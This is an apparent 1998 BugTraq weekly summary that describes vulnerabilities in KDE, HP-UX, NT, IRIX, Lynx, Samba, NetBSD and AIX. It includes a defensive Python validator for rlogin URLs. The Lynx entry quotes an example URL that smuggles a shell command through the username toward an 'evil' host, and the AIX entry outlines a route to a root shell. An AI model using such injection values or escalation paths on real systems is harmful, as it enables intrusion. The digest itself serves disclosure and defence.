BugTraq summary, week of 16 nov 1998 & week of 23 nov 1998.

I was on vacation and my company got eaten by AOL.  So here are two weeks rolled into one.

kde's kppp and klock are a mess
KDE's klock (an xlock equivalent, not a clock) is setuid root and attempts to run "kblankscrn.kss" as root.  If that file isn't found (or isn't marked executable), klock searches the user's PATH for a "kblankscrn.kss" and runs that one as root.  It also trusts environment variables such as KDEDIR to point to copies of executables which it will run as root.  kppp has the same flaws.

hpux vacation sends parameters to sendmail
HPUX's "vacation" program accidentally sends certain parameters to sendmail that could be exploited by a remote user.  No further information was given by HP.

nt's snmp insecure
The default SNMP server for NT (which isn't automatically installed) puts everything in the "public" community, meaning anyone can read and write things like your routing table.  Only NT 4.04 allows a community to be set read-only, so the only solution for others is to change the community name to something secret.  Local users on an NT box may be able to read the community name(s) from your registry if you haven't set the registry permissions right.

irix osview falls into the /tmp trap
The osview GUI program for IRIX tries to create files in /tmp that have predictable (in fact, never changing) filenames.  It doesn't check for softlinks or even try to open them exclusively.  Anyone can therefore softlink these files to something like /etc/passwd to corrupt system files.  Apparently this only happens if you run osview from the chost GUI (not when run from the command line).

lynx rlogin bug
Lynx strips "evil" characters (shell metacharacters) from most things, but forgets to strip them from the username segment of an rlogin url (such as rlogin://robey@yak.net).  You can set up an evil "rlogind" that just sends commands, and they'll be executed by anyone going to rlogin://evil|sh@evil.yak.net.
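As an added example (my own code, not lynx's), here is the kind of allow-list check that avoids this class of bug: the username part of an rlogin URL is validated against a login-name pattern and handed to rlogin as its own argv element, never through a shell.  The regexes, the rlogin_argv name and the sample URLs are assumptions made up for the example.

```python
import re
from urllib.parse import urlsplit, unquote

# Allow-lists constructed for this example: a login name and a hostname as
# rlogin itself would accept them.  Anything else (shell metacharacters,
# whitespace, control bytes) is rejected outright rather than "stripped",
# which is where lynx went wrong: strip lists are easy to leave incomplete.
SAFE_USER = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_.-]{0,31}$")
SAFE_HOST = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.-]{0,253}$")


def rlogin_argv(url: str):
    """Turn an rlogin:// URL into an argv list for execv(), or None.

    Returning an argv list (never a command string) means no shell ever sees
    the username, and the allow-lists reject anything that doesn't look like
    a plain login name anyway."""
    parts = urlsplit(url)
    if parts.scheme != "rlogin" or not parts.netloc:
        return None
    # Percent-decode BEFORE checking, so "evil%7Csh" can't slip past the
    # check and be decoded later by something downstream.
    user = unquote(parts.username or "")
    host = unquote(parts.hostname or "")
    if not SAFE_HOST.match(host):
        return None
    argv = ["rlogin"]
    if user:
        if not SAFE_USER.match(user):
            return None
        argv += ["-l", user]
    return argv + [host]


if __name__ == "__main__":
    # Constructed sample URLs: one benign, one like the bulletin's example.
    for sample in ("rlogin://robey@yak.net", "rlogin://evil|sh@evil.yak.net"):
        print(sample, "->", rlogin_argv(sample))
```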

nt named pipes knocked out rpc
Microsoft released a patch for an NT bug where using a named pipe to talk to an RPC service could cause it to lock up and spin.  If you sent random data to the RPC service over the named pipe, the RPC service would attempt to close the connection, but somehow get lost and spin instead.  (A named pipe is just a data stream between processes that uses a filename to identify the connection.  At least on unix.  I assume it's the same on NT.)

samba forgot the sticky bit
The samba team announced that they had made two security mistakes in samba 1.9.18.  They accidentally included a prototype program called 'wsmbconf' which had the group-setuid bit on.  The file can just be erased.  Also /var/spool/samba was created world-writable, but didn't have the sticky bit set.  This apparently doesn't affect Redhat distributions because they ship with a beta of 1.9.18.

netbsd was playing loose with mmap
Unix 'mmap' maps a disk file into memory space (roughly translating memory reads/writes back to the disk).  On NetBSD, several device drivers supported having their device files mapped into memory, but didn't check the offset parameter, so they accidentally allowed access to pieces of memory that weren't actually related to a current map.  The effects varied from platform to platform, depending on how well the drivers were written.

aix "info explorer" bug
AIX comes with an "info explorer" which is basically an online GUI help system.  Part of it uses a unix-domain socket (a special file that behaves exactly like a network connection between processes on a single machine).  It doesn't do any authentication over this socket, and assumes that it can trust all info sent to it, so you can use this socket to ask the "info explorer" to open up a window on your display.  From there you can change the printer options to spawn a shell, and you have root access.

buffer overflows

browser bugs